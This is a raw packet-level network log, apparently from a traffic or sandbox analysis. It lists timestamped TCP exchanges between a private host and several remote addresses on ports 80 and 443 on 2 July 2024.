Jul 2, 2024 00:05:08.640825987 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.640835047 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.640837908 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.640846014 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.640856028 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.640867949 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.640877962 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.640878916 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.640878916 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.640888929 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640899897 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640908003 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.640911102 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640922070 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640932083 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640943050 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640952110 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640957117 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.640957117 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.640963078 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.640973091 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.640974045 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.640976906 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.640985012 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.640995026 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.640995979 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641005993 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641016960 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641026020 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641027927 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.641037941 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641041040 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.641048908 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641061068 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.641098022 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.641448975 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641464949 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641474962 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641486883 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641503096 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641514063 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641524076 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641531944 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.641531944 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.641534090 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641545057 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641556025 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641565084 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.641566038 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641577005 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641585112 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.641587019 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641597986 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641602993 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.641609907 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641618013 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.641621113 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.641647100 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.641670942 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.642007113 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.642019033 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.642030001 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.642040014 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.642050982 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.642060995 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.642071009 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642071962 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.642081976 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642091990 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642092943 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.642092943 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.642102957 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642113924 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642126083 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.642128944 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642138958 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.642139912 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642149925 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642158985 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642168999 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642170906 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.642179012 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642179012 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.642189980 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642199993 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642210007 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642219067 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642229080 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642232895 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.642232895 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.642255068 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.642258883 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642270088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642271996 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.642283916 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642294884 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642301083 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.642304897 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642322063 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642323017 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.642332077 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642343044 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642354012 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642358065 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.642358065 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.642364025 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642374039 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642385006 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642389059 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.642398119 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.642409086 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.642421007 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.642465115 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.642496109 CEST	49732	443	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:08.642513990 CEST	443	49732	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:08.643260956 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643273115 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643281937 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643297911 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643307924 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643318892 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643326044 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.643327951 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.643338919 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.643348932 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.643359900 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.643362045 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.643368959 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.643379927 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.643382072 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.643389940 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.643400908 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.643409967 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.643410921 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.643421888 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.643435001 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.643462896 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.643462896 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.643686056 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.643697977 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.643708944 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.643718958 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.643729925 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643739939 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643748999 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643748999 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.643765926 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643768072 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.643778086 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643794060 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.643794060 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643798113 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.643810987 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643812895 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.643822908 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643832922 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643843889 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643847942 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.643853903 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643862963 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643872976 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643873930 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.643873930 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.643882990 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643893003 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643903017 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643910885 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.643913984 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643923998 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643934965 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643940926 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.643940926 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.643944979 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643954039 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643959999 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.643963099 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.643970966 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.643980980 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643990993 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.643991947 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644001007 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644011021 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644021988 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644028902 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644031048 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.644032955 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644042969 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644045115 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644053936 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644062042 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644063950 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644073963 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644084930 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644094944 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644104958 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644109964 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644109964 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644115925 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644128084 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644138098 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644148111 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644150019 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644150972 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644157887 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644167900 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644191027 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644191027 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644206047 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644459963 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644470930 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644505024 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644658089 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644670010 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644678116 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644682884 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644694090 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644702911 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644712925 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644723892 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644743919 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644743919 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644772053 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644790888 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.644810915 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644823074 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644833088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644838095 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.644845009 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644855976 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644865990 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644877911 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644879103 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644887924 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644900084 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644907951 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644907951 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644911051 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644932985 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644947052 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644958019 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644967079 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644973040 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644977093 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644980907 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.644987106 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.644998074 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645004988 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.645014048 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645025015 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645035028 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645045042 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645050049 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.645050049 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.645055056 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645065069 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645075083 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645085096 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645087004 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.645095110 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645106077 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645114899 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.645114899 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.645117044 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645128012 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645137072 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645145893 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645152092 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.645168066 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.645168066 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.645200014 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.645216942 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.645284891 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.645452023 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.645503044 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.645518064 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.645529985 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645540953 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645551920 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645562887 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645571947 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.645574093 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645581007 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.645584106 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645587921 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.645587921 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.645593882 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645600080 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.645600080 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645637989 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.645646095 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.645657063 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.645668983 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.645668983 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.645694971 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.645715952 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.645759106 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.645817041 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.645859003 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.645909071 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.645932913 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645945072 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645955086 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645956039 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.645966053 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645976067 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645984888 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.645986080 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.645992994 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.645997047 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646008015 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646018028 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646028042 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646028042 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646028042 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646039009 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646049976 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646053076 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646061897 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.646065950 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646075010 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646078110 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646087885 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646090984 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.646099091 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646101952 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646109104 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646119118 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646126986 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.646130085 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646138906 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.646142006 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646152020 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.646156073 CEST	49714	80	192.168.2.6	77.105.133.27
